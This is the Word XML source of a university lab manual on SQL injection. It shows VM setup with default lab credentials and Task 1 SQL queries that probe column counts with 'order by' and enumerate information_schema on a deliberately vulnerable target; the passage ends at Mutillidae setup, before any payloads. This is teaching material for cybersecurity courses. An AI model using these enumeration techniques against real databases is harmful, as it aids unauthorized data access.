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68F5E13" w14:textId="77777777" w:rsidR="00615E00" w:rsidRDefault="004747E9" w:rsidP="00615E00">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>SQL Injection Attack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576"/>
      </w:tblGrid>
      <w:tr w:rsidR="009801A3" w14:paraId="448770F8" w14:textId="77777777" w:rsidTr="00D224C2">
        <w:trPr>
          <w:trHeight w:val="638"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3518CBC8" w14:textId="77777777" w:rsidR="00D224C2" w:rsidRDefault="00D224C2" w:rsidP="00D224C2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 2016-2017 Frank Xu, Bowie State University.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134E7912" w14:textId="77777777" w:rsidR="00DD2425" w:rsidRPr="00DD2425" w:rsidRDefault="00D224C2" w:rsidP="00D224C2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The lab manual </w:t>
            </w:r>
            <w:r w:rsidRPr="002E4A79">
              <w:rPr>
                <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsiaTheme="minorEastAsia" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsiaTheme="minorEastAsia" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>developed for cybersecurity courses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at BSU. Comments and suggestions can </w:t>
            </w:r>
            <w:r w:rsidRPr="002E4A79">
              <w:rPr>
                <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsiaTheme="minorEastAsia" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>be sent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to wxu@bowiestate.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B05B43C" w14:textId="77777777"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14:paraId="44E028FB" w14:textId="77777777" w:rsidR="00615E00" w:rsidRPr="00CB1F5D" w:rsidRDefault="00615E00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CB1F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
      <w:r w:rsidR="00A809CB" w:rsidRPr="00CB1F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690EE16" w14:textId="77777777" w:rsidR="008A73E8" w:rsidRPr="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8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</w:instrText>
      </w:r>
      <w:r w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText>https://information.rapid7.com/metasploitable-download.html</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D72271">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Download and install metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AB814" w14:textId="77777777" w:rsidR="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72271">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>information.rapid7.com/metasploitable-download.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344BB4B" w14:textId="77777777" w:rsidR="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8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name: msfadmin   Password: msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED218E5" w14:textId="77777777" w:rsidR="008A73E8" w:rsidRPr="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8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 w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Download and install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kali to VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D11CB5A" w14:textId="77777777" w:rsidR="008A73E8" w:rsidRDefault="008A73E8" w:rsidP="008A73E8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Usename: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="008A73E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>toor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB32472" w14:textId="77777777" w:rsidR="002A278A" w:rsidRDefault="002A278A" w:rsidP="002A278A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ke sure two images are in the same network. You need to Ping each other to make sure the network works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A00B4" w14:textId="77777777" w:rsidR="00D143E7" w:rsidRDefault="00D143E7" w:rsidP="00D143E7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D143E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00D143E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>etasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: 10.0.2.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E49EAAF" w14:textId="77777777" w:rsidR="00F15ABA" w:rsidRDefault="00D143E7" w:rsidP="00F15ABA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D143E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kali: 10.0.2.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BD07A1" w14:textId="77777777" w:rsidR="00F15ABA" w:rsidRDefault="00F15ABA" w:rsidP="00A959CE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78B28C34" wp14:editId="74B9AD29">
            <wp:extent cx="5875376" cy="2389069"/>
            <wp:effectExtent l="152400" t="152400" r="354330" b="3543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9806" cy="24030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DA6CFA" w14:textId="77777777" w:rsidR="00F15ABA" w:rsidRPr="00D143E7" w:rsidRDefault="00F70001" w:rsidP="005A3141">
      <w:pPr>
        <w:ind w:left="720"/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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123501FF" wp14:editId="169A501B">
            <wp:extent cx="2721182" cy="2198788"/>
            <wp:effectExtent l="152400" t="152400" r="365125" b="3543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1986" cy="22155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938338" w14:textId="77777777" w:rsidR="003D4F9B" w:rsidRPr="00CB1F5D" w:rsidRDefault="002A278A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CB1F5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 1</w:t>
      </w:r>
      <w:r w:rsidR="00D143E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: Familiar with SQL</w:t>
      </w:r>
      <w:r w:rsidR="003F0F68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DD15C" w14:textId="77777777" w:rsidR="003D4F9B" w:rsidRPr="0022091C" w:rsidRDefault="005A3141" w:rsidP="0022091C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5A3141">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00862FD1" w:rsidRPr="005A3141">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>ysql –</w:t>
      </w:r>
      <w:r w:rsidR="00635642">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00862FD1" w:rsidRPr="005A3141">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> root –h 10.0.2.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F5A457" w14:textId="77777777" w:rsidR="0022091C" w:rsidRDefault="0022091C" w:rsidP="0022091C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38FFE5B0" wp14:editId="4C1B6E86">
            <wp:extent cx="4600937" cy="164522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10264" cy="1648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E8959" w14:textId="77777777" w:rsidR="003F0F68" w:rsidRPr="00237DBC" w:rsidRDefault="005A3141" w:rsidP="00237DBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003F0F68" w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>how databases</w:t>
      </w:r>
      <w:r w:rsidR="003E1F7E" w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D8232E" w14:textId="77777777" w:rsidR="00862FD1" w:rsidRPr="00237DBC" w:rsidRDefault="003E1F7E" w:rsidP="00237DBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>use owasp10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA5B53" w14:textId="77777777" w:rsidR="003E1F7E" w:rsidRPr="00237DBC" w:rsidRDefault="003E1F7E" w:rsidP="00237DBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E6128" w14:textId="77777777" w:rsidR="00D143E7" w:rsidRDefault="00A439E8" w:rsidP="00237DBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>select * from accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BC660C" w14:textId="62D1C448" w:rsidR="00716D8F" w:rsidRDefault="00716D8F" w:rsidP="00716D8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>select * from accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F7507" w14:textId="737C3B78" w:rsidR="00716D8F" w:rsidRDefault="00716D8F" w:rsidP="00716D8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>select * from accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49213911" w14:textId="33DCE424" w:rsidR="00716D8F" w:rsidRPr="00716D8F" w:rsidRDefault="00716D8F" w:rsidP="00716D8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>select * from accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70822BD9" w14:textId="77777777" w:rsidR="0077037E" w:rsidRPr="00237DBC" w:rsidRDefault="00610963" w:rsidP="00237DBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0077037E" w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>elect * from accounts where username='admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD90863" w14:textId="77777777" w:rsidR="0057571C" w:rsidRPr="00237DBC" w:rsidRDefault="0057571C" w:rsidP="00237DBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>select * from information_schema</w:t>
      </w:r>
      <w:r w:rsidR="007A31EE" w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D238ED0" w14:textId="77777777" w:rsidR="00834243" w:rsidRDefault="00834243" w:rsidP="00237DBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237DBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>select * from information_schema.tables were table_schema='owasp10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A394CCD" w14:textId="77777777" w:rsidR="00724E5D" w:rsidRDefault="00724E5D" w:rsidP="00724E5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182A9B08" w14:textId="77777777" w:rsidR="007A7691" w:rsidRDefault="007A7691" w:rsidP="00962BD0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43542E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: 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Familiar with Web Application </w:t>
      </w:r>
      <w:r w:rsidR="0043542E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>with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Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A30BD" w14:textId="77777777" w:rsidR="004B368E" w:rsidRPr="004B368E" w:rsidRDefault="004B368E" w:rsidP="004B368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4B368E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mutillidae has a configuration problem. You need to fix it before the lab. This is nothing to do with our lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C8A4B" w14:textId="77777777" w:rsidR="004B368E" w:rsidRDefault="00060A7A" w:rsidP="004B368E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536BDF7F" wp14:editId="6C69FCA7">
            <wp:extent cx="5812970" cy="914400"/>
            <wp:effectExtent l="152400" t="152400" r="359410" b="3619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78804" cy="9247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D22B98" w14:textId="77777777" w:rsidR="00370BE3" w:rsidRPr="00370BE3" w:rsidRDefault="00370BE3" w:rsidP="008C575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370BE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Control X to save the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF69F2" w14:textId="77777777" w:rsidR="004B368E" w:rsidRDefault="004B368E" w:rsidP="00370BE3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390E73A0" wp14:editId="7A769CC2">
            <wp:extent cx="5281936" cy="1477926"/>
            <wp:effectExtent l="152400" t="152400" r="356870" b="3702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70526" cy="15306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F028FA" w14:textId="77777777" w:rsidR="008C575B" w:rsidRPr="008C575B" w:rsidRDefault="00A959CE" w:rsidP="008C575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gister</w:t>
      </w:r>
      <w:r w:rsidR="008C575B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> an account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60E447" w14:textId="77777777" w:rsidR="007A7691" w:rsidRDefault="007A7691" w:rsidP="00643173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3368C44D" wp14:editId="553F8155">
            <wp:extent cx="4899640" cy="2283357"/>
            <wp:effectExtent l="152400" t="152400" r="358775" b="3651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76952" cy="23193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222906" w14:textId="77777777" w:rsidR="00643173" w:rsidRDefault="00643173" w:rsidP="00643173">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
